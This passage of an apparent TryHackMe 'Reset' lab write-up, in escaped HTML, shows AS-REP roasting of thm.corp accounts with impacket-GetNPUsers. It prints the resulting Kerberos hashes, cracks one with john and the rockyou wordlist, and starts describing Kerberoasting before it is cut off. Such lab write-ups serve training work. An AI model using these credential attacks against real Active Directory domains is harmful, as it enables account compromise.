4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Windows-Boxes\/Reset\/LDAP<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">impacket-GetNPUsers<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">thm.corp\/AUTOMATE<\/span><span style=\"color: #BABED8\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Impacket<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">v0.11.0<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Copyright<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Fortra<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Password:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Name<\/span><span style=\"color: #BABED8\">           <\/span><span style=\"color: #C3E88D\">MemberOf<\/span><span style=\"color: #BABED8\">                                                      <\/span><span style=\"color: #C3E88D\">PasswordLastSet<\/span><span style=\"color: #BABED8\">             <\/span><span style=\"color: #C3E88D\">LastLogon<\/span><span style=\"color: #BABED8\">                   <\/span><span style=\"color: #C3E88D\">UAC<\/span><span style=\"color: #BABED8\">      <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">-------------<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">------------------------------------------------------------<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">--------------------------<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">--------------------------<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">--------<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">ERNESTO_SILVA<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">CN=Gu-gerardway-distlist1,OU=AWS,OU=Stage,DC=thm,DC=corp<\/span><span style=\"color: #BABED8\">      <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #C3E88D\">-07-18<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">11<\/span><span style=\"color: #C3E88D\">:21:44.224354<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #C3E88D\">neve<\/span><span style=\"color: #BABED8\">r<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\">                     <\/span><span style=\"color: #F78C6C\">0x410200<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">TABATHA_BRITT<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">CN=Gu-gerardway-distlist1,OU=AWS,OU=Stage,DC=thm,DC=corp<\/span><span style=\"color: #BABED8\">      <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #C3E88D\">-08-21<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">15<\/span><span style=\"color: #C3E88D\">:32:59.571306<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #C3E88D\">-08-21<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">15<\/span><span style=\"color: #C3E88D\">:32:05.792734<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">0x410200<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">LEANN_LONG<\/span><span style=\"color: #BABED8\">     <\/span><span style=\"color: #C3E88D\">CN=CH-ecu-distlist1,OU=Groups,OU=OGC,OU=Stage,DC=thm,DC=corp<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #C3E88D\">-07-18<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">11<\/span><span style=\"color: #C3E88D\">:21:44.161807<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #C3E88D\">-06-16<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">07<\/span><span style=\"color: #C3E88D\">:16:11.147334<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">0x410200<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Since these three users are in the same group, we can grab their TGT hashes by simply running the following command.<\/p>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset]\n\u2514\u2500$ impacket-GetNPUsers thm.corp\/ERNESTO_SILVA\nImpacket v0.11.0 - Copyright 2023 Fortra\n\nPassword:\n[*] Cannot authenticate ERNESTO_SILVA, getting its TGT\n$krb5asrep$23$ERNESTO_SILVA@THM.CORP:d300ae23d022f70e1d45a886be57cac2$1c39ef5e656e37d8ef496e291789abf2977b7223f6d2a6a419afbc5486ff4e8f18935408e185603dcbe91506854a55e43300e03188c8e981341ff8aaf1cbac028ad1eec41be42cf4f9164019f65b983d3f1a71bcae122ec9fef93920f7010e476fdf5321c8dfa2112288dc4138573fcc81185c364b3cd8ef2b735c14846bf0eeb65dc42e3e39312d78c12cf8af8177e44673a8a7d84e8fdd6bd2847e3509b87245acd85aa14811b28654942c9a947b51d9aaf2cef20e4c38ba18856dc12e843046458afea9615c255c194fb69a72a34095b5cd15d39ed856ffb456a758020ee101f850\n\n\n\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset]\n\u2514\u2500$ impacket-GetNPUsers thm.corp\/TABATHA_BRITT\nImpacket v0.11.0 - Copyright 2023 Fortra\n\nPassword:\n[*] Cannot authenticate TABATHA_BRITT, getting its TGT\n$krb5asrep$23$TABATHA_BRITT@THM.CORP:d6e6f0bd263464212f9b562917ae7b06$f1a0ee5c074f9f5780524e6670bf8b44ea6000e58df5c558c7daa071233919adc2143a0bb8fe2401ea6c091ec0c692920584a0c8f8c7fbf6038124946087fa46366202d66855183e802198f2b7061fa012d5a2905c25b113f90a089253e386c41be6e668367ca692c4ec08c1fd1467879b863660732c8e38a156687da1d7c0d2fc6315d4c29772c987f7bfab390b090e1393a65c0101c4c0655ba7c57ed4bf6b2010992000ca07dc45c5e9963dc7bef00fb0131cf4d9b734ebea0ee4ee4dec2d4c7310c8d46273b9ae0aba4cc15895cedd90594f3e61bf3e56d3cdb1f937187264c0a740\n\n\n\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset]\n\u2514\u2500$ impacket-GetNPUsers thm.corp\/LEANN_LONG   \nImpacket v0.11.0 - Copyright 2023 Fortra\n\nPassword:\n[*] Cannot authenticate LEANN_LONG, getting its TGT\n$krb5asrep$23$LEANN_LONG@THM.CORP:b3be523ae5e4f0fd2b9c151d4b797218$dedd3581eb9545f7f1fa74d6cfa85abd9a93c13632b479ce1313feb1fefc3bed18857777c6259ec1eeaff87fb42d3fb02f468cd0b5c7ca8423a0013ce8f7115d949780af58317e4dd80d143ac59ef224e592f9343d9aab82d0153cc1d2fcb560444703d99e2d20ec6b937fce756086f9613c7c4109218d4e036e757fc496f9611ae12c892c44effde6fd52ee3e9c2b15646571273017f11819a827e68d7b714872b519eb2940ee5c0378bcf2c960d5ac270cd6e35452b221ecc176763ed5e0e36880aefcc84e67f97eaa2fdde60a1bbf2a06aed695943ba46d8ed0c9de176d6f415af294\n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Windows-Boxes\/Reset<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">impacket-GetNPUsers<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">thm.corp\/ERNESTO_SILVA<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Impacket<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">v0.11.0<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Copyright<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Fortra<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Password:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> Cannot authenticate ERNESTO_SILVA, getting its TGT<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">$krb5asrep$23$ERNESTO_SILVA@THM.CORP:d300ae23d022f70e1d45a886be57cac2$1c39ef5e656e37d8ef496e291789abf2977b7223f6d2a6a419afbc5486ff4e8f18935408e185603dcbe91506854a55e43300e03188c8e981341ff8aaf1cbac028ad1eec41be42cf4f9164019f65b983d3f1a71bcae122ec9fef93920f7010e476fdf5321c8dfa2112288dc4138573fcc81185c364b3cd8ef2b735c14846bf0eeb65dc42e3e39312d78c12cf8af8177e44673a8a7d84e8fdd6bd2847e3509b87245acd85aa14811b28654942c9a947b51d9aaf2cef20e4c38ba18856dc12e843046458afea9615c255c194fb69a72a34095b5cd15d39ed856ffb456a758020ee101f850<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Windows-Boxes\/Reset<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">impacket-GetNPUsers<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">thm.corp\/TABATHA_BRITT<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Impacket<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">v0.11.0<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Copyright<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Fortra<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Password:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> Cannot authenticate TABATHA_BRITT, getting its TGT<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">$krb5asrep$23$TABATHA_BRITT@THM.CORP:d6e6f0bd263464212f9b562917ae7b06$f1a0ee5c074f9f5780524e6670bf8b44ea6000e58df5c558c7daa071233919adc2143a0bb8fe2401ea6c091ec0c692920584a0c8f8c7fbf6038124946087fa46366202d66855183e802198f2b7061fa012d5a2905c25b113f90a089253e386c41be6e668367ca692c4ec08c1fd1467879b863660732c8e38a156687da1d7c0d2fc6315d4c29772c987f7bfab390b090e1393a65c0101c4c0655ba7c57ed4bf6b2010992000ca07dc45c5e9963dc7bef00fb0131cf4d9b734ebea0ee4ee4dec2d4c7310c8d46273b9ae0aba4cc15895cedd90594f3e61bf3e56d3cdb1f937187264c0a740<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Windows-Boxes\/Reset<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">impacket-GetNPUsers<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">thm.corp\/LEANN_LONG<\/span><span style=\"color: #BABED8\">   <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Impacket<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">v0.11.0<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Copyright<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Fortra<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Password:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> Cannot authenticate LEANN_LONG, getting its TGT<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">$krb5asrep$23$LEANN_LONG@THM.CORP:b3be523ae5e4f0fd2b9c151d4b797218$dedd3581eb9545f7f1fa74d6cfa85abd9a93c13632b479ce1313feb1fefc3bed18857777c6259ec1eeaff87fb42d3fb02f468cd0b5c7ca8423a0013ce8f7115d949780af58317e4dd80d143ac59ef224e592f9343d9aab82d0153cc1d2fcb560444703d99e2d20ec6b937fce756086f9613c7c4109218d4e036e757fc496f9611ae12c892c44effde6fd52ee3e9c2b15646571273017f11819a827e68d7b714872b519eb2940ee5c0378bcf2c960d5ac270cd6e35452b221ecc176763ed5e0e36880aefcc84e67f97eaa2fdde60a1bbf2a06aed695943ba46d8ed0c9de176d6f415af294<\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Out of the three user hashes we obtained, we can crack one for the user <strong><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">TABATHA_BRITT<\/mark><\/strong>.<\/p>\n\n\n\n<div style=\"height:18px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset]\n\u2514\u2500$ john tabatha.hash --wordlist=\/usr\/share\/wordlists\/rockyou.txt \nUsing default input encoding: UTF-8\nLoaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17\/18\/23 [MD4 HMAC-MD5 RC4 \/ PBKDF2 HMAC-SHA1 AES 128\/128 SSE2 4x])\nWill run 4 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\nmarlxxxxxx)   ($krb5asrep$23$TABATHA_BRITT@THM.CORP)     \n1g 0:00:00:04 DONE (2024-01-28 18:48) 0.2008g\/s 1157Kp\/s 1157Kc\/s 1157KC\/s marlee109..markyza3\nUse the &quot;--show&quot; option to display all of the cracked passwords reliably\nSession completed.\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Windows-Boxes\/Reset<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">john<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">tabatha.hash<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">--wordlist=\/usr\/share\/wordlists\/rockyou.txt<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Using<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">default<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">input<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">encoding:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">UTF-8<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Loaded<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">password<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">hash<\/span><span style=\"color: #BABED8\"> (krb5asrep, <\/span><span style=\"color: #C3E88D\">Kerberos<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">5<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">AS-REP<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">etype<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">17<\/span><span style=\"color: #C3E88D\">\/18\/23<\/span><span style=\"color: #BABED8\"> [MD4 <\/span><span style=\"color: #C3E88D\">HMAC-MD5<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RC4<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\/<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">PBKDF2<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">HMAC-SHA1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">AES<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">128<\/span><span style=\"color: #C3E88D\">\/128<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SSE2<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">4<\/span><span style=\"color: #C3E88D\">x]<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Will<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">run<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">4<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">OpenMP<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">threads<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Press<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">q<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">or<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Ctrl-C<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">abort,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">almost<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">any<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">other<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">key<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">for<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">status<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">marlxxxxxx<\/span><span style=\"color: #BABED8\">)   <\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #BABED8\">$krb5asrep$23$TABATHA_BRITT@THM.CORP<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">     <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">1g<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #C3E88D\">:00:00:04<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">DONE<\/span><span style=\"color: #BABED8\"> (2024-01-28 <\/span><span style=\"color: #F78C6C\">18<\/span><span style=\"color: #C3E88D\">:48<\/span><span style=\"color: #BABED8\">) 0.2008g\/s 1157Kp\/s 1157Kc\/s 1157KC\/s marlee109..markyza3<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Use<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">the<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">--show<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">option<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">display<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">all<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">of<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">the<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">cracked<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">passwords<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">reliably<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Session<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">completed.<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:23px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">GetUserSPNs<\/mark><\/h4>\n\n\n\n<p><a href=\"https:\/\/github.com\/SecureAuthCorp\/impacket\/blob\/master\/examples\/GetUserSPNs.py\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">GetUserSPNs.py<\/a> can be used to obtain a password hash for user accounts that have an SPN (service principal name). If an SPN is set on a user account it is possible to request a Service Ticket for this account and attempt to crack it in order to retrieve the user password. This attack is named <a href=\"https:\/\/www.thehacker.recipes\/ad\/movement\/kerberos\/kerberoast\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">Kerberoast<\/a>. This script can also be used for <a href=\"https:\/\/www.thehacker.recipes\/ad\/movement\/kerberos\/kerberoast#kerberoast-w-o-pre-authentication\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">Kerberoast without preauthentication<\/a>.<\/p>\n\n\n\n<div style=\"height:17px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" 